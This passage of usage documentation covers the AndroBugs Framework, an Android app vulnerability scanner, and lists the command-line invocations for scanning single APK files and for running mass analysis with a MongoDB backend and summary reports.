  5. androbugs.exe -h
  6. androbugs.exe -f [APK file]

Usage for Unix/Linux


To run the AndroBugs Framework:
python androbugs.py -f [APK file]
To check the usage:
python androbugs.py -h

Usage of Massive Analysis Tools for Unix/Linux


Prerequisite: Setup MongoDB and config your own MongoDB settings in “androbugs-db.cfg”
To run the massive analysis for AndroBugs Framework:
python AndroBugs_MassiveAnalysis.py -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -d [APKs input directory] -o [Report output directory]
Example:
python AndroBugs_MassiveAnalysis.py -b 20151112 -t BlackHat -d ~/All_Your_Apps/ -o ~/Massive_Analysis_Reports
To get the summary report and all the vectors of massive analysis:
python AndroBugs_ReportSummary.py -m massive -b [Your_Analysis_Number] -t [Your_Analysis_Tag]
Example:
python AndroBugs_ReportSummary.py -m massive -b 20151112 -t BlackHat